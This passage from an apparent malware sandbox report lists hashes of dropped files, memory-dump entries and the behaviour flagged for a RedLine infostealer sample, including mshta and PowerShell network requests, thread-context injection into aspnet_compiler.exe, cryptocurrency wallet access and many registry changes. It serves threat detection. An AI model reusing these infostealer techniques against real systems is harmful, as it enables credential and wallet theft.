| SHA512 | b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_af569bf9-a3b0-401f-89f0-6243fe22a9f6
| MD5 | e5b3ba61c3cf07deda462c9b27eb4166 |
| SHA1 | b324dad73048be6e27467315f82b7a5c1438a1f9 |
| SHA256 | b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925 |
| SHA512 | a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_41a3bea5-07c0-4dc0-b129-ab20944650b3
| MD5 | 7f79b990cb5ed648f9e583fe35527aa7 |
| SHA1 | 71b177b48c8bd745ef02c2affad79ca222da7c33 |
| SHA256 | 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683 |
| SHA512 | 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda |
memory/960-199-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 6de8868439a8983fcfb3c56e27bd9f8a |
| SHA1 | 0ee941befc1c766299c68447ef66fc77eeb06e87 |
| SHA256 | 1c51525a81f2b978114001fd83aace6097ba9b806b2c91be130edfcd4b83fda6 |
| SHA512 | 891234f62c44c73375dc1430588397e35c35b36a96b5244c5a8dd8a435cd7c7039746afe534d210290ba4cbc6591ff72797cbd83910cc0327cd0de2211ea26d3 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/960-205-0x000000001ABD0000-0x000000001ABD2000-memory.dmp
memory/960-206-0x000000001ABD4000-0x000000001ABD6000-memory.dmp
memory/1156-215-0x0000000000000000-mapping.dmp
C:\Windows\system32\rfxvmt.dll
| MD5 | dc39d23e4c0e681fad7a3e1342a2843c |
| SHA1 | 58fd7d50c2dca464a128f5e0435d6f0515e62073 |
| SHA256 | 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9 |
| SHA512 | 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7 |
memory/1332-217-0x0000000000000000-mapping.dmp
memory/1020-218-0x0000000000000000-mapping.dmp
memory/2032-219-0x0000000000000000-mapping.dmp
memory/2016-220-0x0000000000000000-mapping.dmp
memory/1808-221-0x0000000000000000-mapping.dmp
memory/912-222-0x0000000000000000-mapping.dmp
memory/428-223-0x0000000000000000-mapping.dmp
memory/1156-224-0x0000000000000000-mapping.dmp
memory/2040-225-0x0000000000000000-mapping.dmp
memory/1020-226-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | dc9d4cb6f3d8cb2de5f60c656e78b369 |
| SHA1 | 5db2f00f82fd78bebcdc27ec553443534e501489 |
| SHA256 | b9da6eedf79e71d7de33e90166af27ce5d4d3a7df0958e18bf4b48843d3b3b1a |
| SHA512 | 4376089ce79dcfe21f8e22e70c62ee6293b2e0e58b99e5cf091b7a17d7552cd541c493105451d8fd1b3401ebc4e7b6884f8e6e5fd47d93cb83d87ce15516df94 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 2902de11e30dcc620b184e3bb0f0c1cb |
| SHA1 | 5d11d14a2558801a2688dc2d6dfad39ac294f222 |
| SHA256 | e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544 |
| SHA512 | efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\F9WBQWYI.txt
| MD5 | e3499a1069b8251a7a9b014e9b7145c0 |
| SHA1 | d2590f975be408c0cc57943859e49e4542bef656 |
| SHA256 | 7a5fa8904c8269ffe304a17cc6ebf1cbddbf5b83563e0694d1c8a445e1b215d6 |
| SHA512 | d5a913627b2e2d9f18bda9cd40f5cdf03b5b282c4c40e0e448a965f7ecf10c2bfb94a6a87741cbeb4f7af72a052835655ba8422f52194979e9c09eae29b19792 |
memory/1848-230-0x0000000000000000-mapping.dmp
memory/1508-231-0x0000000000000000-mapping.dmp
memory/2040-232-0x0000000000000000-mapping.dmp
memory/1716-233-0x0000000000000000-mapping.dmp
memory/2016-234-0x0000000000000000-mapping.dmp
memory/1020-235-0x0000000000000000-mapping.dmp
memory/1544-236-0x0000000000000000-mapping.dmp
memory/1156-237-0x0000000000000000-mapping.dmp
memory/2032-238-0x0000000000000000-mapping.dmp
memory/1116-239-0x0000000000000000-mapping.dmp
\Windows\Branding\mediasrv.png
| MD5 | b110f38845e18a04ab59a7d8a134ef40 |
| SHA1 | 8119030034e6fbe62d875e824b5233c1f29d61a0 |
| SHA256 | 1cbd533a8cf6875e9b9bc60b11711b591bd30aac6377a11ee90c2735182414ea |
| SHA512 | 80eb80651141c2e00165f089700cc15eb3c5e5eee4ce4e91759e63f5230db8445bc3793c0f5fd259f98ce2939f19633fe7225db990e6574fd739f1d29cf7f223 |
\Windows\Branding\mediasvc.png
| MD5 | 5768a809b9fcbff117dffa8cbf2e8852 |
| SHA1 | a056e76d15bc7509d0361175b2ae4ba348460cd6 |
| SHA256 | 8ab19cdbe2b963c8bcf8cac6a11e003423ec91ffad88d885d550beb835e46094 |
| SHA512 | 99d14d6b3c6cf2e872def0b5dd76ffd81d4c71b577bf5fa4700dbb524d5d26bf09d4ffab2dfc6d493303711b635669f35e7cfc90578e6cc2e2f251f422818b8b |
memory/2072-242-0x0000000000000000-mapping.dmp
memory/2084-243-0x0000000000000000-mapping.dmp
memory/2120-244-0x0000000000000000-mapping.dmp
memory/2132-245-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2184-247-0x0000000000000000-mapping.dmp
memory/2196-248-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2248-250-0x0000000000000000-mapping.dmp
memory/2260-251-0x0000000000000000-mapping.dmp
memory/2308-252-0x0000000000000000-mapping.dmp
memory/2320-253-0x0000000000000000-mapping.dmp
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2376-256-0x0000000000000000-mapping.dmp
memory/2388-257-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2456-259-0x0000000000000000-mapping.dmp
memory/2528-260-0x0000000000000000-mapping.dmp
memory/2592-261-0x0000000000000000-mapping.dmp
memory/2604-262-0x0000000000000000-mapping.dmp
memory/2604-266-0x0000000019310000-0x0000000019312000-memory.dmp
memory/2604-267-0x0000000019314000-0x0000000019316000-memory.dmp
memory/2604-298-0x000000001931A000-0x0000000019339000-memory.dmp
memory/2848-299-0x0000000000000000-mapping.dmp
memory/2860-300-0x0000000000000000-mapping.dmp
memory/2884-301-0x0000000000000000-mapping.dmp
memory/2896-302-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\clr.exe
| MD5 | 472208d7ba18d4c14b7e90b9db5d6feb |
| SHA1 | ff24cc43998ff99e61b1a838e1d51c4888498935 |
| SHA256 | ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d |
| SHA512 | 9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15 |
memory/2968-304-0x0000000000000000-mapping.dmp
memory/2980-305-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2021-08-14 06:48
Reported
2021-08-14 06:50
Platform
win10v20210410
Max time kernel
151s
Max time network
152s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\936213988.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\936213988.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1137791014.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2988 set thread context of 3544 | N/A | C:\Users\Admin\AppData\Local\Temp\936213988.exe | C:\Users\Admin\AppData\Local\Temp\936213988.exe |
| PID 3872 set thread context of 4936 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\ESE.TXT | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\browser_broker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 0100000041d4683b016610a3fb6c0da47a242beb5199c321c566955b767afed05acb1795a834fef4cae423457310d867e3d9595e529aca577804adacecc2ec238792997065fe1af99228853a1d650d29bf37243a1dbc17783b9c8ac4f46f | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CacheLimit = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "335771510" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\NextPromptBuild = "15063" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CTLs | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 1642edecd890d701 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 01000000c72fb1536feb18a56114af715885f469bf6ebc4593fe8b880c6bd79198d136c4ef9903b8f44ccc9aef0f155b186b88c208d58364ed0f33c6c612 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 301bd569d72dd701 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
